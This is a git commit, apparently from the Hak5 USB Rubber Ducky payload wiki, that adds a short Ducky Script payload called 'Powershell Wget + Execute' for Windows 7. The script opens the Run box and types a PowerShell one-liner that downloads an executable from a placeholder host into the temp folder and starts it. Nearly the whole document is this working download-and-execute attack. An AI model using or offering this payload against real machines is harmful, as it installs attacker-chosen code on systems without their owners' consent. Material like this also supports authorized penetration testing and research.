Created Payload powershell wget + execute (markdown)

This commit is contained in:
hak5darren 2012-02-03 18:15:57 -08:00
parent f6d1463a23
commit f572a55799
1 changed files with 10 additions and 0 deletions

View File

@ -0,0 +1,10 @@
Powershell Wget + Execute
Author: mubix
Duckencoder: 1.2
Target: Windows 7
Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER